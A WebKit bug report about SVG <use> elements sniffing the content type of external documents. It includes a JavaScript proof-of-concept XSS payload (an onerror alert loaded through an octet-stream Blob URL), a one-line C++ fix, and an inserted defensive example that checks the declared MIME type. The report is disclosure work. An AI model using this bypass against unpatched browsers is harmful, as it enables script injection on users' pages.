RESOLVED FIXED 249948
SVGUseElement sniffs content type when loading external document
https://bugs.webkit.org/show_bug.cgi?id=249948
Summary SVGUseElement sniffs content type when loading external document
Jun Kokatsu
Reported 2022-12-29 14:38:35 PST
PoC:

```js
const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`;
const blob = new Blob([text], {type: 'application/octet-stream'}); // <- not "image/svg+xml"
const url = URL.createObjectURL(blob);
let attackerControlledString = url + "#x";
const svg = document.createElementNS("http://www.w3.org/2000/svg", "svg");
const use = document.createElementNS("http://www.w3.org/2000/svg", "use");
use.setAttribute('href', attackerControlledString);
svg.appendChild(use);
document.body.appendChild(svg);
```

The above code only loads external SVG from a Blob URL in WebKit. Both Blink and Gecko ignore it due to content type mismatch.

Potential fix is to add the following code after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614.

```cpp
options.sniffContent = ContentSniffingPolicy::DoNotSniffContent;
```
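The check that Blink and Gecko apply, and that the proposed WebKit fix achieves by disabling sniffing, can be modelled as follows. This is an added example, not WebKit code and not part of the report; the function names and the sample URLs are constructed for illustration.

```javascript
// Added example (not WebKit code): accept an external <use> document only on its
// declared Content-Type, never on the sniffed body. Names and URLs are hypothetical.

// Parse a Content-Type header into its lowercase "type/subtype" essence,
// dropping parameters such as charset. Returns null for a missing or malformed header.
function mimeEssence(contentType) {
  if (typeof contentType !== 'string') return null;
  const essence = contentType.split(';')[0].trim().toLowerCase();
  return /^[a-z0-9!#$&^_.+-]+\/[a-z0-9!#$&^_.+-]+$/.test(essence) ? essence : null;
}

// Split a <use href="doc#id"> value into the external document URL and the fragment id.
function splitUseHref(href) {
  const hash = href.indexOf('#');
  if (hash < 0) return { documentUrl: href, fragment: '' };
  return { documentUrl: href.slice(0, hash), fragment: href.slice(hash + 1) };
}

// True only when the reference names a document plus an element id AND the
// response declares image/svg+xml. A blob typed application/octet-stream, as in
// the PoC above, is rejected regardless of what its bytes look like.
function acceptUseDocument(href, contentType) {
  const { documentUrl, fragment } = splitUseHref(href);
  if (!documentUrl || !fragment) return false;
  return mimeEssence(contentType) === 'image/svg+xml';
}

// Constructed samples: the first mirrors the PoC's blob URL and declared type.
const samples = [
  ['blob:https://example.test/0b0c#x', 'application/octet-stream'],
  ['https://example.test/icons.svg#x', 'image/svg+xml; charset=utf-8'],
  ['https://example.test/icons.svg#x', 'IMAGE/SVG+XML'],
  ['https://example.test/icons.svg', 'image/svg+xml'],
];
for (const [href, ct] of samples) {
  console.log(href, '|', ct, '->', acceptUseDocument(href, ct) ? 'use' : 'ignore');
}
```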
Radar WebKit Bug Importer
Comment 1 2023-01-04 16:35:34 PST
zak ridouh
Comment 2 2024-08-22 16:02:59 PDT
EWS
Comment 3 2024-09-10 17:14:30 PDT
Committed 283447@main (6ba5b52ad5c1): <https://commits.webkit.org/283447@main> Reviewed commits have been landed. Closing PR #32612 and removing active labels.
EWS
Comment 4 2024-09-12 20:04:47 PDT
Committed 283286.25@safari-7620-branch (a22ef8e7a842): <https://commits.webkit.org/283286.25@safari-7620-branch> Reviewed commits have been landed. Closing PR #1753 and removing active labels.